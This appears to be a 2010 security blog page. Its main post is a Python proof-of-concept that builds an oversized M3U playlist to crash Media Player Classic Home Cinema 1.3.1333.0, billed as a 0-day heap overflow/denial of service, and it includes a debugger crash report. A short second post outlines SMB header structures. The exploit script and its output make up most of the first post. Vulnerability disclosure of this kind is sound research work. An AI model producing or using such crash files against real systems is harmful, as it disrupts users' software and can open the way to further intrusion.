Thursday, July 22, 2010

Media Player Classic - Home Cinema 1.3.1333.0 M3U File Heap Overflow/DoS (0-Day)

# Vulnerability Found: Praveen Darshanam
# Coded: Praveen Darshanam
# Greetz to all Andhra Hackers and ICW Members
# http://www.darshanams.blogspot.com
##########PoC Start################

print("\n*****Program need to be run on Python 3.1*****")
print ("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS 
         (0-Day)\r\n\r\nTested on:\nWindows XP SP3\n
         Media Player Classic - Home Cinema\n\t\t 
         Build number: 1.3.1333.0\n\t\t
         MPC Compiler: VS 2008\n\t\t  FFmpeg Compiler: GCC 4.4.1\n""")

head = "EXTM3U"
buf = "D" * 1000
mal_buf = head + buf
#print ("mal_buf:",mal_buf)
try:
    mpc_mal = open("mpc_m3u_crash.m3u",'w')
    mpc_mal.write (mal_buf)
    mpc_mal.close()
    print ("File Created Successfully: mpc_m3u_crash.m3u\n")
except:
    print ("Cannnot Create M3U File\n")

print ("[+] Found and Coded by: Praveen Darshanam\r\n")
##########PoC End################

When the M3U file is around 1000 bytes following "C++ Runtime Error Exception" is thrown .


If the buffer is increased further Media Player Classic shows below error but doesn't crash.


Playing with M3U file sizes between 950 bytes to 2000 bytes will throw above Exceptions and lead to Crashes occassionally. Crash report with C++ Exception is shown below.

--------------CRASH REPORT START----------------------
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll
ModLoad: 10000000 100fb000 C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll
ModLoad: 02530000 0257f000 C:\WINDOWS\system32\DRMClien.DLL
(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c
eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e pop esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:004> g
WARNING: Continuing a non-continuable exception
(6dc.cec): Break instruction exception - code 80000003 (first chance)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c
eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mpc_hc+0x31d14b:
0071d14b cc int 3

-----------CRASH REPORT END-------------------

Monday, July 12, 2010

Server Message Block (SMB) Protocol Dissection

Primary goal of SMB is File Transfer within LAN.

SMB Header Structure:
SMB_Header
{
UCHAR Protocol[4];
UCHAR Command;
SMB_ERROR Status;
UCHAR Flags;
USHORT Flags2;
USHORT PIDHigh;
UCHAR SecurityFeatures[8];
USHORT Reserved;
USHORT TID;
USHORT PIDLow;
USHORT UID;
USHORT MID;
}

SMB Parameter Block:

SMB_Parameters
{
UCHAR WordCount;
USHORT Words[WordCount] (variable);
}


SMB Data Block:
SMB_Data
{
USHORT ByteCount;
UCHAR Bytes[ByteCount] (variable);
}


For further details
http://msdn.microsoft.com/en-us/library/ee441466%28v=PROT.13%29.aspx
http://www.hsc.fr/ressources/articles/win_net_srv/